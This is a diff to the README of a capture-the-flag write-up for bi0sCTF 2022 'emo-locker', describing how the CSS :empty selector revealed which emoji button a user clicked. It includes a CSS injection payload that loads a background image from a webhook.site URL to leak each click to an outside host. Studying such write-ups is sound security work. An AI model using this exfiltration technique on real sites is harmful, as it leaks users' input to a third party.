GramThanos/bi0sCTF-2022-emo-locker/README.md

 ```
 ![image](https://user-images.githubusercontent.com/14858959/214003245-2a86c85d-6a05-4b9e-b322-7a379ca1ebf4.png)

-Then my observing the page we identified that on each click, the emoji was removed, leaving the button empty from content... thus after some searching we identified the `:empty` css selector that could be used to fire our events.
+Then by observing the page changes on each interaction with the emojies, we identified that on each click, the emoji was removed, leaving the button empty from content... thus after some searching we identified that the `:empty` CSS selector that could be used to detect/fire our events.
-For for emoji with id 1 we had the CSS code:
+For example, for the first emoji (with id 1) we had the following CSS code (we had to generate a differenct CSS code for each emoji):
 ```css
 span[role=img][aria-label="1"]:empty {background: url('https://webhook.site/8566bcb8-ed2f-468c-8ad3-d587c2494428?i=1');}
 ```